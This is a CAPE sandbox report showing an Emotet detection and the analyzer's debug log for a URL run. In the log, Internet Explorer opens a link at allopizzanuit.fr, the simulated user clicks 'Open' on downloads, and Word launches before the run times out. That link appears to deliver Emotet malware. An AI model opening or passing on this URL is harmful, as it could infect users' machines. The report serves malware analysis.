CAPE

Detections: Emotet


Analysis

Category Package Started Completed Duration Options Log
URL ie 2019-02-11 14:54:08 2019-02-11 14:59:00 292 seconds Show Options Show Log
  • Error: The analysis hit the critical timeout, terminating.
route = internet
procdump = 1
2019-02-11 14:54:12,046 [root] INFO: Date set to: 02-11-19, time set to: 14:54:12, timeout set to: 200
2019-02-11 14:54:12,078 [root] DEBUG: Starting analyzer from: C:\tsbvpo
2019-02-11 14:54:12,078 [root] DEBUG: Storing results at: C:\RTxelpCSMm
2019-02-11 14:54:12,078 [root] DEBUG: Pipe server name: \\.\PIPE\GawmCJ
2019-02-11 14:54:12,078 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-02-11 14:54:12,092 [root] INFO: Automatically selected analysis package "ie"
2019-02-11 14:54:14,371 [root] DEBUG: Started auxiliary module Browser
2019-02-11 14:54:14,385 [root] DEBUG: Started auxiliary module Curtain
2019-02-11 14:54:14,385 [modules.auxiliary.digisig] DEBUG: Skipping authenticode validation, analysis is not a file.
2019-02-11 14:54:14,385 [root] DEBUG: Started auxiliary module DigiSig
2019-02-11 14:54:14,385 [root] DEBUG: Started auxiliary module Disguise
2019-02-11 14:54:14,401 [root] DEBUG: Started auxiliary module Human
2019-02-11 14:54:14,417 [root] DEBUG: Started auxiliary module Screenshots
2019-02-11 14:54:14,433 [root] DEBUG: Started auxiliary module Sysmon
2019-02-11 14:54:14,433 [root] DEBUG: Started auxiliary module Usage
2019-02-11 14:54:14,433 [root] INFO: Analyzer: Package modules.packages.ie does not specify a DLL option
2019-02-11 14:54:14,433 [root] INFO: Analyzer: Package modules.packages.ie does not specify a DLL_64 option
2019-02-11 14:54:14,667 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Internet Explorer\iexplore.exe" with arguments ""http://allopizzanuit.fr/mm.microsoft.ms/med/event/dNhfd4yt/dNhfd4yt"" with pid 3028
2019-02-11 14:54:14,667 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:54:14,683 [lib.api.process] INFO: 32-bit DLL to inject is C:\tsbvpo\dll\EWdjDWLc.dll, loader C:\tsbvpo\bin\GzFLMqR.exe
2019-02-11 14:54:15,104 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3028
2019-02-11 14:54:17,115 [lib.api.process] INFO: Successfully resumed process with pid 3028
2019-02-11 14:54:17,115 [root] INFO: Added new process to list with pid: 3028
2019-02-11 14:54:17,615 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:54:17,615 [root] DEBUG: Process dumps enabled.
2019-02-11 14:54:17,895 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 3028 at 0x74940000, image base 0xd0000, stack from 0x482000-0x490000
2019-02-11 14:54:17,911 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Internet Explorer\iexplore.exe" "http:\allopizzanuit.fr\mm.microsoft.ms\med\event\dNhfd4yt\dNhfd4yt".
2019-02-11 14:54:17,911 [root] INFO: Monitor successfully loaded in process with pid 3028.
2019-02-11 14:54:17,990 [root] DEBUG: DLL unloaded from 0x754F0000.
2019-02-11 14:54:18,193 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\system32\IEFRAME (0xa80000 bytes).
2019-02-11 14:54:18,270 [root] DEBUG: DLL loaded at 0x74830000: C:\Windows\system32\OLEACC (0x3c000 bytes).
2019-02-11 14:54:18,364 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-02-11 14:54:18,566 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\profapi (0xb000 bytes).
2019-02-11 14:54:18,614 [root] INFO: Disabling sleep skipping.
2019-02-11 14:54:18,676 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-02-11 14:54:18,691 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-02-11 14:54:18,739 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\dnsapi (0x44000 bytes).
2019-02-11 14:54:18,753 [root] DEBUG: DLL loaded at 0x74810000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2019-02-11 14:54:18,786 [root] DEBUG: DLL loaded at 0x74800000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-02-11 14:54:18,848 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-02-11 14:54:19,065 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-02-11 14:54:19,160 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\System32\nlaapi (0x10000 bytes).
2019-02-11 14:54:19,190 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-02-11 14:54:19,207 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-02-11 14:54:19,207 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-02-11 14:54:19,332 [root] DEBUG: DLL unloaded from 0x74340000.
2019-02-11 14:54:19,394 [root] DEBUG: DLL loaded at 0x750B0000: C:\Windows\syswow64\comdlg32 (0x7b000 bytes).
2019-02-11 14:54:19,519 [root] DEBUG: DLL loaded at 0x74360000: C:\Program Files (x86)\Internet Explorer\sqmapi (0x33000 bytes).
2019-02-11 14:54:19,519 [root] DEBUG: DLL unloaded from 0x76C00000.
2019-02-11 14:54:19,519 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:19,533 [root] DEBUG: DLL unloaded from 0x74360000.
2019-02-11 14:54:19,533 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-02-11 14:54:19,533 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-02-11 14:54:19,565 [root] DEBUG: DLL unloaded from 0x772F0000.
2019-02-11 14:54:19,581 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-02-11 14:54:19,767 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-02-11 14:54:19,799 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-02-11 14:54:19,815 [root] DEBUG: DLL unloaded from 0x000D0000.
2019-02-11 14:54:19,831 [root] INFO: Announced 32-bit process name: iexplore.exe pid: 2228
2019-02-11 14:54:19,831 [root] INFO: Added new process to list with pid: 2228
2019-02-11 14:54:19,831 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:54:19,831 [lib.api.process] INFO: 32-bit DLL to inject is C:\tsbvpo\dll\EWdjDWLc.dll, loader C:\tsbvpo\bin\GzFLMqR.exe
2019-02-11 14:54:19,831 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2228
2019-02-11 14:54:19,831 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-02-11 14:54:19,831 [root] DEBUG: DLL loaded at 0x74320000: C:\Windows\system32\rasman (0x15000 bytes).
2019-02-11 14:54:19,831 [root] DEBUG: DLL unloaded from 0x74340000.
2019-02-11 14:54:19,845 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:54:19,845 [root] DEBUG: Process dumps enabled.
2019-02-11 14:54:19,845 [root] INFO: Disabling sleep skipping.
2019-02-11 14:54:19,845 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2228 at 0x74940000, image base 0xd0000, stack from 0x572000-0x580000
2019-02-11 14:54:19,845 [root] DEBUG: Commandline: C:\Users\user\Desktop\"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3028 CREDAT:79873.
2019-02-11 14:54:19,845 [root] INFO: Monitor successfully loaded in process with pid 2228.
2019-02-11 14:54:19,845 [root] DEBUG: DLL unloaded from 0x754F0000.
2019-02-11 14:54:19,861 [root] DEBUG: DLL loaded at 0x72F70000: C:\Windows\system32\IEFRAME (0xa80000 bytes).
2019-02-11 14:54:19,861 [root] DEBUG: DLL loaded at 0x74830000: C:\Windows\system32\OLEACC (0x3c000 bytes).
2019-02-11 14:54:19,861 [root] DEBUG: DLL loaded at 0x743A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-02-11 14:54:19,861 [root] DEBUG: DLL loaded at 0x750B0000: C:\Windows\syswow64\comdlg32 (0x7b000 bytes).
2019-02-11 14:54:19,861 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-02-11 14:54:19,878 [root] DEBUG: DLL unloaded from 0x747D0000.
2019-02-11 14:54:19,878 [root] DEBUG: DLL unloaded from 0x74320000.
2019-02-11 14:54:19,878 [root] DEBUG: DLL loaded at 0x742E0000: C:\Program Files (x86)\Internet Explorer\IEShims (0x35000 bytes).
2019-02-11 14:54:19,878 [root] DEBUG: DLL unloaded from 0x75600000.
2019-02-11 14:54:19,878 [root] DEBUG: DLL loaded at 0x742D0000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-02-11 14:54:19,892 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-02-11 14:54:19,892 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-02-11 14:54:19,892 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-02-11 14:54:19,892 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-02-11 14:54:19,892 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-02-11 14:54:19,892 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-02-11 14:54:19,892 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-02-11 14:54:19,892 [root] DEBUG: DLL loaded at 0x742C0000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-02-11 14:54:19,908 [root] DEBUG: DLL loaded at 0x742B0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-02-11 14:54:19,908 [root] DEBUG: DLL loaded at 0x74230000: C:\Program Files (x86)\Internet Explorer\sqmapi (0x33000 bytes).
2019-02-11 14:54:19,908 [root] DEBUG: DLL unloaded from 0x76C00000.
2019-02-11 14:54:19,908 [root] DEBUG: DLL loaded at 0x74270000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-02-11 14:54:19,908 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:19,924 [root] DEBUG: DLL unloaded from 0x74230000.
2019-02-11 14:54:19,956 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-02-11 14:54:19,970 [root] DEBUG: DLL loaded at 0x74210000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-02-11 14:54:19,970 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-02-11 14:54:19,970 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-02-11 14:54:19,970 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-02-11 14:54:19,970 [root] DEBUG: DLL loaded at 0x74110000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-02-11 14:54:19,970 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1632
2019-02-11 14:54:19,970 [root] INFO: Added new process to list with pid: 1632
2019-02-11 14:54:19,970 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-02-11 14:54:19,970 [root] DEBUG: DLL loaded at 0x740F0000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-02-11 14:54:19,970 [lib.api.process] INFO: 64-bit DLL to inject is C:\tsbvpo\dll\KHgFHNG.dll, loader C:\tsbvpo\bin\FYvljThn.exe
2019-02-11 14:54:19,970 [root] DEBUG: DLL loaded at 0x740E0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-02-11 14:54:19,970 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-02-11 14:54:19,986 [root] DEBUG: DLL unloaded from 0x74810000.
2019-02-11 14:54:19,986 [root] DEBUG: DLL unloaded from 0x740F0000.
2019-02-11 14:54:19,986 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-02-11 14:54:19,986 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-02-11 14:54:20,002 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 14:54:20,002 [root] DEBUG: Process dumps enabled.
2019-02-11 14:54:20,017 [root] INFO: Disabling sleep skipping.
2019-02-11 14:54:20,049 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\profapi (0xb000 bytes).
2019-02-11 14:54:20,095 [root] WARNING: Unable to place hook on LockResource
2019-02-11 14:54:20,095 [root] WARNING: Unable to hook LockResource
2019-02-11 14:54:20,095 [root] DEBUG: DLL loaded at 0x73FD0000: C:\Windows\system32\IEUI (0x2d000 bytes).
2019-02-11 14:54:20,127 [root] DEBUG: DLL loaded at 0x73FC0000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2019-02-11 14:54:20,174 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1632 at 0x0000000074000000, image base 0x00000000FF900000, stack from 0x0000000004392000-0x00000000043A0000
2019-02-11 14:54:20,174 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-02-11 14:54:20,174 [root] INFO: Monitor successfully loaded in process with pid 1632.
2019-02-11 14:54:20,174 [root] DEBUG: DLL loaded at 0x73F90000: C:\Program Files (x86)\Internet Explorer\ieproxy (0x2b000 bytes).
2019-02-11 14:54:20,204 [root] DEBUG: DLL loaded at 0x74110000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-02-11 14:54:20,220 [root] DEBUG: DLL unloaded from 0x74110000.
2019-02-11 14:54:20,252 [root] DEBUG: DLL loaded at 0x73F80000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-02-11 14:54:20,267 [root] DEBUG: DLL loaded at 0x73F00000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-02-11 14:54:20,454 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-02-11 14:54:20,470 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-02-11 14:54:20,470 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-02-11 14:54:20,470 [root] DEBUG: DLL unloaded from 0x75E70000.
2019-02-11 14:54:20,516 [root] DEBUG: DLL loaded at 0x73ED0000: C:\Windows\system32\xmllite (0x2f000 bytes).
2019-02-11 14:54:20,611 [root] DEBUG: DLL loaded at 0x73D60000: C:\Windows\system32\explorerframe (0x16f000 bytes).
2019-02-11 14:54:20,657 [root] DEBUG: DLL loaded at 0x73D30000: C:\Windows\system32\DUser (0x2f000 bytes).
2019-02-11 14:54:20,673 [root] DEBUG: DLL loaded at 0x73C70000: C:\Windows\system32\DUI70 (0xb2000 bytes).
2019-02-11 14:54:20,813 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-02-11 14:54:20,813 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-02-11 14:54:20,828 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\dnsapi (0x44000 bytes).
2019-02-11 14:54:20,828 [root] DEBUG: DLL loaded at 0x74810000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2019-02-11 14:54:20,828 [root] DEBUG: DLL loaded at 0x74800000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-02-11 14:54:20,828 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-02-11 14:54:20,845 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-02-11 14:54:20,845 [root] DEBUG: DLL loaded at 0x73F90000: C:\Program Files (x86)\Internet Explorer\ieproxy (0x2b000 bytes).
2019-02-11 14:54:20,875 [root] DEBUG: DLL loaded at 0x73BD0000: C:\Windows\system32\msfeeds (0x96000 bytes).
2019-02-11 14:54:20,953 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-02-11 14:54:20,970 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-02-11 14:54:20,970 [root] DEBUG: DLL unloaded from 0x74F40000.
2019-02-11 14:54:21,000 [root] DEBUG: DLL loaded at 0x73BA0000: C:\Windows\system32\MLANG (0x2e000 bytes).
2019-02-11 14:54:21,000 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-02-11 14:54:21,000 [root] DEBUG: DLL loaded at 0x74320000: C:\Windows\system32\rasman (0x15000 bytes).
2019-02-11 14:54:21,000 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-02-11 14:54:21,000 [root] DEBUG: DLL loaded at 0x751A0000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-02-11 14:54:21,000 [root] DEBUG: DLL loaded at 0x742D0000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-02-11 14:54:21,000 [root] DEBUG: DLL unloaded from 0x74340000.
2019-02-11 14:54:21,016 [root] DEBUG: DLL unloaded from 0x75600000.
2019-02-11 14:54:21,016 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:21,016 [root] DEBUG: DLL unloaded from 0x74320000.
2019-02-11 14:54:21,016 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\system32\mswsock (0x3c000 bytes).
2019-02-11 14:54:21,016 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-02-11 14:54:21,016 [root] DEBUG: DLL loaded at 0x751A0000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-02-11 14:54:21,032 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-02-11 14:54:21,032 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-02-11 14:54:21,048 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-02-11 14:54:21,048 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-02-11 14:54:21,048 [root] DEBUG: DLL loaded at 0x742C0000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-02-11 14:54:21,048 [root] DEBUG: DLL loaded at 0x742B0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-02-11 14:54:21,048 [root] DEBUG: DLL loaded at 0x73BA0000: C:\Windows\system32\MLANG (0x2e000 bytes).
2019-02-11 14:54:21,048 [root] DEBUG: DLL loaded at 0x74270000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-02-11 14:54:21,062 [root] DEBUG: DLL loaded at 0x74210000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-02-11 14:54:21,078 [root] DEBUG: DLL loaded at 0x740F0000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-02-11 14:54:21,078 [root] DEBUG: DLL loaded at 0x740E0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-02-11 14:54:21,078 [root] DEBUG: DLL unloaded from 0x74810000.
2019-02-11 14:54:21,078 [root] DEBUG: DLL unloaded from 0x740F0000.
2019-02-11 14:54:21,078 [root] DEBUG: DLL loaded at 0x73F00000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-02-11 14:54:21,094 [root] DEBUG: DLL loaded at 0x73B80000: C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim (0x11000 bytes).
2019-02-11 14:54:21,109 [root] DEBUG: DLL loaded at 0x73AE0000: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80 (0x9b000 bytes).
2019-02-11 14:54:21,125 [root] DEBUG: DLL loaded at 0x72EE0000: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80 (0x87000 bytes).
2019-02-11 14:54:21,157 [root] DEBUG: DLL loaded at 0x73AD0000: C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper (0x10000 bytes).
2019-02-11 14:54:21,578 [root] DEBUG: DLL loaded at 0x72DA0000: C:\PROGRA~2\MICROS~1\Office14\URLREDIR (0x91000 bytes).
2019-02-11 14:54:21,594 [root] DEBUG: DLL loaded at 0x72ED0000: C:\Windows\system32\Secur32 (0x8000 bytes).
2019-02-11 14:54:21,594 [root] DEBUG: DLL loaded at 0x74D80000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90 (0xa3000 bytes).
2019-02-11 14:54:21,594 [root] DEBUG: DLL loaded at 0x72EB0000: C:\PROGRA~2\MICROS~1\Office14\MSOHEV (0x14000 bytes).
2019-02-11 14:54:21,655 [root] DEBUG: DLL loaded at 0x72EA0000: C:\Program Files (x86)\Java\jre7\bin\jp2ssv (0xf000 bytes).
2019-02-11 14:54:21,671 [root] DEBUG: DLL loaded at 0x72CE0000: C:\Program Files (x86)\Java\jre7\bin\MSVCR100 (0xbe000 bytes).
2019-02-11 14:54:21,703 [root] DEBUG: set_caller_info: Adding region at 0x04390000 to caller regions list (ntdll::LdrLoadDll).
2019-02-11 14:54:21,717 [root] DEBUG: set_caller_info: Adding region at 0x01ED0000 to caller regions list (advapi32::RegOpenKeyExA).
2019-02-11 14:54:21,717 [root] DEBUG: DLL loaded at 0x72E40000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-02-11 14:54:21,858 [root] DEBUG: DLL loaded at 0x72CC0000: C:\Windows\system32\DWMAPI (0x13000 bytes).
2019-02-11 14:54:21,874 [root] DEBUG: DLL loaded at 0x72E40000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-02-11 14:54:21,921 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-02-11 14:54:22,046 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:22,263 [root] DEBUG: DLL unloaded from 0x75600000.
2019-02-11 14:54:23,232 [root] WARNING: File at path "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\favicon[1].ico" does not exist, skip.
2019-02-11 14:54:23,388 [root] DEBUG: DLL unloaded from 0x75600000.
2019-02-11 14:54:23,855 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCB00000 to caller regions list (msvcrt::memcpy).
2019-02-11 14:54:23,855 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::LdrGetDllHandle).
2019-02-11 14:54:23,887 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF71F0000 to caller regions list (ntdll::NtCreateEvent).
2019-02-11 14:54:25,181 [root] DEBUG: DLL loaded at 0x72C70000: C:\Windows\System32\Wpc (0x4f000 bytes).
2019-02-11 14:54:25,181 [root] DEBUG: DLL loaded at 0x72C50000: C:\Windows\System32\USERENV (0x17000 bytes).
2019-02-11 14:54:25,181 [root] DEBUG: DLL loaded at 0x72C00000: C:\Windows\System32\wevtapi (0x42000 bytes).
2019-02-11 14:54:25,227 [root] DEBUG: DLL loaded at 0x72BF0000: C:\Windows\system32\samcli (0xf000 bytes).
2019-02-11 14:54:25,243 [root] DEBUG: DLL loaded at 0x72BD0000: C:\Windows\system32\SAMLIB (0x12000 bytes).
2019-02-11 14:54:25,290 [root] DEBUG: DLL loaded at 0x72BC0000: C:\Windows\system32\netutils (0x9000 bytes).
2019-02-11 14:54:25,447 [root] DEBUG: DLL unloaded from 0x76C00000.
2019-02-11 14:54:26,273 [modules.auxiliary.human] INFO: Found button "&Open", clicking it
2019-02-11 14:54:27,474 [root] DEBUG: DLL unloaded from 0x73ED0000.
2019-02-11 14:54:27,474 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-02-11 14:54:27,522 [root] DEBUG: DLL loaded at 0x72C50000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-02-11 14:54:27,522 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-02-11 14:54:27,584 [root] DEBUG: DLL loaded at 0x73EF0000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2019-02-11 14:54:27,599 [root] DEBUG: DLL unloaded from 0x73FD0000.
2019-02-11 14:54:27,599 [root] DEBUG: DLL unloaded from 0x743A0000.
2019-02-11 14:54:27,599 [root] DEBUG: DLL unloaded from 0x73D60000.
2019-02-11 14:54:27,599 [root] DEBUG: DLL unloaded from 0x72DA0000.
2019-02-11 14:54:27,631 [root] DEBUG: DLL unloaded from 0x72EA0000.
2019-02-11 14:54:27,677 [root] DEBUG: DLL unloaded from 0x73B80000.
2019-02-11 14:54:28,052 [root] DEBUG: DLL unloaded from 0x76C00000.
2019-02-11 14:54:28,052 [root] DEBUG: DLL loaded at 0x73EE0000: C:\Windows\system32\winshfhc (0x6000 bytes).
2019-02-11 14:54:28,082 [root] DEBUG: DLL loaded at 0x73EA0000: C:\Windows\system32\WDSCORE (0x32000 bytes).
2019-02-11 14:54:28,098 [root] DEBUG: DLL unloaded from 0x75A50000.
2019-02-11 14:54:28,628 [modules.auxiliary.human] INFO: Found button "&Open", clicking it
2019-02-11 14:54:29,767 [root] DEBUG: DLL loaded at 0x73E90000: C:\Program Files (x86)\Windows Defender\MpOav (0x10000 bytes).
2019-02-11 14:54:29,845 [root] DEBUG: DLL unloaded from 0x76C00000.
2019-02-11 14:54:32,450 [root] INFO: Announced 32-bit process name:  pid: 1
2019-02-11 14:54:32,450 [root] INFO: Added new process to list with pid: 1
2019-02-11 14:54:32,450 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-02-11 14:54:32,450 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-02-11 14:54:32,529 [root] DEBUG: DLL unloaded from 0x000007FEFB9C0000.
2019-02-11 14:54:33,434 [root] INFO: Process with pid 1 has terminated
2019-02-11 14:54:37,723 [root] DEBUG: DLL loaded at 0x73E20000: C:\Program Files (x86)\Windows Defender\MPCLIENT (0x63000 bytes).
2019-02-11 14:54:37,818 [root] DEBUG: DLL loaded at 0x75470000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2019-02-11 14:54:38,176 [root] DEBUG: DLL unloaded from 0x73E20000.
2019-02-11 14:54:38,176 [root] DEBUG: DLL unloaded from 0x72F70000.
2019-02-11 14:54:38,191 [root] DEBUG: DLL unloaded from 0x754F0000.
2019-02-11 14:54:38,191 [root] DEBUG: DLL unloaded from 0x73E20000.
2019-02-11 14:54:38,815 [root] DEBUG: DLL loaded at 0x73E30000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2019-02-11 14:54:38,846 [root] DEBUG: DLL loaded at 0x73E80000: C:\Windows\system32\msiltcfg (0x7000 bytes).
2019-02-11 14:54:38,878 [root] DEBUG: DLL loaded at 0x72980000: C:\Windows\system32\msi (0x240000 bytes).
2019-02-11 14:54:38,894 [root] DEBUG: DLL unloaded from 0x72980000.
2019-02-11 14:54:39,019 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-02-11 14:54:39,019 [root] DEBUG: DLL loaded at 0x73E70000: C:\Windows\SysWOW64\SFC (0x3000 bytes).
2019-02-11 14:54:39,033 [root] DEBUG: DLL loaded at 0x73E60000: C:\Windows\system32\sfc_os (0xd000 bytes).
2019-02-11 14:54:42,404 [modules.auxiliary.human] INFO: Found button "&Open", clicking it
2019-02-11 14:54:42,404 [root] INFO: Announced 32-bit process name: WINWORD.EXE pid: 828
2019-02-11 14:54:42,404 [root] INFO: Added new process to list with pid: 828
2019-02-11 14:54:42,404 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 14:54:42,404 [lib.api.process] INFO: 32-bit DLL to inject is C:\tsbvpo\dll\EWdjDWLc.dll, loader C:\tsbvpo\bin\GzFLMqR.exe
2019-02-11 14:54:42,404 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 828
2019-02-11 14:54:42,434 [root] DEBUG: DLL loaded at 0x73E20000: C:\Windows\system32\DEVRTL (0xe000 bytes).
2019-02-11 14:54:42,434 [root] DEBUG: DLL unloaded from 0x73E70000.
2019-02-11 14:54:42,513 [root] DEBUG: DLL loaded at 0x73E00000: C:\Windows\system32\MPR (0x12000 bytes).
